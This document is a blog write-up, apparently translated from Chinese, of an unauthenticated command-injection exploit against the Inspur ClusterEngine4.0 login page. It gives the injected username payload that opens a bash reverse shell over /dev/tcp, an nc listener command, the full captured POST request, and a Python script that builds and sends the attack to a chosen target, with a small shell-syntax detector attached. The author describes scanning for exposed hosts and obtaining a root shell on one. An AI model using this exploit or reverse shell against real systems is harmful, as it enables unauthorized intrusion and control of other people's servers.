# Inspur (浪潮) ClusterEngine4.0 Cluster Management System Unauthenticated RCE

Just as I was slacking off again, 空白 (crazygod) sent over the payload for the Inspur ClusterEngine4.0 cluster management system unauthenticated RCE. Huh? Then I had to go and reproduce it right away. No sooner said than done: a quick round of fofa searching.

Payload (`{reverse-shell IP}` is the address of your listener; this template uses port 80, the request further down uses 3344). Reading the payload: the injected `username` value closes a quoted value and a parenthesised call, ends the statement, and then uses backticks, which are shell command substitution, so the value evidently reaches a shell. `bash -i >& /dev/tcp/... 0>&1` is the standard bash reverse shell; `/dev/tcp/` is a bash feature, so it needs bash rather than a plain `sh` on the target.

```http
POST /login

op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{reverse-shell IP}%2F80%200%3E%261`
```

I tried several sites and the capture failed on all of them; they must have been patched. As soon as I captured, the connection to the server failed. With my temper, straight on to the next one. Finally I got to one where the capture worked.

First, start a listener on the VPS: `nc -lvp 3344`. The port must match the one in the payload: the request below uses 3344 where the template above had 80.

Then open the login page, capture the login request, craft the payload, and go:

(screenshot: image-20210311141348195)

The POST request is as follows (the target address is masked; the Content-Length of 103 is consistent with a 13-character dotted IP in the body):

```http
POST /login HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin: https://ip
Connection: close
Referer: https://ip/module/login/login.html
Cookie: lang=cn

op=login&username=1%202\',\'1\'\);`bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F***.**.**.***%2F3344%200%3E%261`
```

Sending the packet succeeded and got me a root shell.

(screenshot: image-20210311141652743)
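As an added example (this is not the original post's tooling, nor 空白's PoC), the script below rebuilds the captured request body with the listener address filled in, using the same partial percent-encoding as the capture, and pairs it with a small check a defender could run over login bodies at a WAF or reverse proxy. The target URL, LHOST and LPORT are placeholders you supply; the benign and encoded test bodies are constructed for illustration.

```python
"""Rebuild the ClusterEngine4.0 /login request from this page and check
form bodies for shell syntax. Added example, not the original post's code.
Target URL, LHOST and LPORT are placeholders supplied by the caller."""
import ssl
import sys
import urllib.request
from urllib.parse import quote, unquote_plus

# Characters the captured request left unencoded inside the username value:
# backslash, single quote, parentheses, comma, semicolon and backticks.
# Spaces, '>', '&' and '/' inside the command were percent-encoded.
_RAW = "\\'(),;`"

# Injected before the command: closes a quoted value and a call, then ends
# the statement. Copied verbatim from the captured request on this page.
_PREFIX = r"1 2\',\'1\'\);"


def reverse_shell_cmd(lhost: str, lport: int) -> str:
    """Standard bash reverse shell. Needs bash on the target: /dev/tcp/ is a
    bash feature, so a /bin/sh that is dash will not open the socket."""
    return f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def build_body(lhost: str, lport: int) -> str:
    """Form body of the captured request with the listener filled in."""
    injected = _PREFIX + "`" + reverse_shell_cmd(lhost, lport) + "`"
    return "op=login&username=" + quote(injected, safe=_RAW)


# Markers that have no business in a login field; matched after URL decoding.
SHELL_MARKERS = ("`", "$(", "/dev/tcp/", "bash -i", ">&")


def decode_form(body: str) -> dict:
    """Split an x-www-form-urlencoded body on '&' only and decode each pair,
    so a percent-encoded '&' inside a value (as in the payload) stays put."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields


def flag_login_body(body: str) -> dict:
    """Return {field: [markers seen]} for every field containing shell syntax.
    Decoding first means %60 or %3E%26 are caught like the raw characters."""
    hits = {}
    for field, values in decode_form(body).items():
        found = [m for m in SHELL_MARKERS if any(m in v for v in values)]
        if found:
            hits[field] = found
    return hits


def send(base_url: str, body: str) -> str:
    """POST the body to /login with the headers from the capture. The target
    on this page was reached by bare IP over https, so certificate checking
    is disabled. Once the shell connects back the request blocks until the
    shell exits, so a timeout here is the expected outcome."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        base_url.rstrip("/") + "/login",
        data=body.encode(),
        headers={
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": "lang=cn",
        },
        method="POST",
    )
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # usage: python poc.py https://TARGET LHOST LPORT   (listener: nc -lvp LPORT)
    if len(sys.argv) != 4:
        sys.exit("usage: poc.py https://target lhost lport")
    payload = build_body(sys.argv[2], int(sys.argv[3]))
    print("flagged fields:", flag_login_body(payload))
    try:
        print(send(sys.argv[1], payload)[:200])
    except Exception as exc:  # a timeout is normal once the shell has connected
        print("request ended:", exc)
```

The check decodes before matching because the capture sends the command percent-encoded; a rule that only looks at the raw body would miss `%60` or `%2Fdev%2Ftcp%2F`. Splitting on `&` alone matters for the same reason: the `%26` inside the reverse shell must stay part of the `username` value rather than starting a new field.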

As for the root cause, I don't really understand it either; it ends in command execution. I haven't looked at the source code, so we'll have to wait for 空白 大佬 to analyze it for us.